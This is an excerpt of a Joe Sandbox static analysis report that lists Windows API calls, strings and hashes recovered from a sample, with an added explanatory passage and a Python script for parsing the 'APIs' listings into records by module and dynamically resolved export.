                                                                          • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-591603554
                                                                          • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                          • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                          • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                          • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
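Several of the listings in this section resolve exports at run time instead of through the import table (the Ctl3d* names at 0041F22E to 0041F26D, RegDeleteKeyExA at 0042DD99, SfcIsFileProtected at 0045439E), which is the behaviour behind the "Contains functionality to dynamically determine API calls" signature, and the three calls into VERSION at 00451B90 to 00451BD7 appear as raw addresses (74D31500, 74D31520, 74D31540) rather than export names, values that belong to this run's module layout and move with ASLR. The parser below is an added example and not part of the report: it turns these bullet lines into records, separates unresolved targets from named ones, groups calls by module, and collects the export names handed to GetProcAddress. Argument values in these listings are recovered statically and are a best guess only (the advapi32.dll argument at 0042DD99 is the module name, with the real export RegDeleteKeyExA visible only in the String ID line), so the filter discards '?', placeholder addresses and .dll names. The input is a constructed subset of lines copied from this section, one of them shortened.

```python
"""Extract call facts from Joe Sandbox "APIs" listings (added example, not from the report)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# One bullet per API reference, for example:
#   • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
#   • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class ApiCall:
    api: str          # export name, or a raw address when the plugin could not name the target
    module: str
    args: List[str]   # statically reconstructed; '?' means not recovered
    ref: str          # address of the call site
    subcall: str = ""  # callee address when the report attributes the call to a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub") or ""))
    return calls


def unresolved_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Targets shown as a raw address (74D31520.VERSION): key on module + call site, not on the address."""
    return [c for c in calls if HEX8.match(c.api)]


def calls_by_module(calls: List[ApiCall]) -> Dict[str, Set[str]]:
    grouped: Dict[str, Set[str]] = {}
    for c in calls:
        grouped.setdefault(c.module, set()).add(c.api)
    return grouped


def dynamically_resolved_exports(calls: List[ApiCall]) -> Dict[str, str]:
    """Map export name -> call site for GetProcAddress calls whose name argument was recovered.
    A '?' or an 8-hex placeholder means the tracer did not recover the string; a '.dll' name is the
    module that the static argument reconstruction picked up instead of the export."""
    found: Dict[str, str] = {}
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        name = c.args[1]
        if name == "?" or HEX8.match(name) or name.lower().endswith(".dll"):
            continue
        found[name] = c.ref
    return found


# Constructed input: lines copied from this section (the GetModuleHandleA argument list is shortened).
SAMPLE_LISTING = """
• Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
• Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13), ref: 0042DD93
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
• 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
• CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LISTING)
    print("resolved at run time:", dynamically_resolved_exports(parsed))
    print("unresolved targets:", [(c.module, c.api, c.ref) for c in unresolved_calls(parsed)])
    print("by module:", {m: sorted(a) for m, a in calls_by_module(parsed).items()})
```

Run it over the whole "APIs" section of a report to get a quick picture of which imports never appear in the import table; those names (and the strings next to them) are the stable part of an otherwise packed sample and usually make better YARA material than the raw call-site addresses.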
                                                                          APIs
                                                                          • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                          • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                          • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: D31500D31520D31540
                                                                          • String ID: j]I
                                                                          • API String ID: 1003763464-3121892809
                                                                          • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                          • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                          • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                          • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastProcess
                                                                          • String ID: XtE$ptE
                                                                          • API String ID: 2919029540-3149052308
                                                                          • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                          • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                          • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                          • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                          APIs
                                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 395431579-1506664499
                                                                          • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                          • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                          • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                          • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                          Strings
                                                                          • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                          • PendingFileRenameOperations, xrefs: 00454F5C
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                          • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                          • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                          • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004712C1
                                                                          • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 004712DF
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004713E3
                                                                          • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 00471401
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                          • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                          • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                          • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                          • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                          • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                          • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                          • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 00421371
                                                                          • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                          • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                          • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                          • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                          APIs
                                                                          • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                          • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                          • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                          • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                          • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                          • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                          • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A14620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2780753366-0
                                                                          • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                          • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                          • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                          • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                          APIs
                                                                            • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                          Strings
                                                                          • EndOffset range exceeded, xrefs: 0045BAED
                                                                          • NumRecs range exceeded, xrefs: 0045BAB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                          • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                          • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                          • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                          APIs
                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                            • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                            • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                            • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
                                                                            • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                            • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                            • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                            • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                            • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                            • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                            • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                            • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                            • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                            • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                            • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                            • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                            • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                            • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
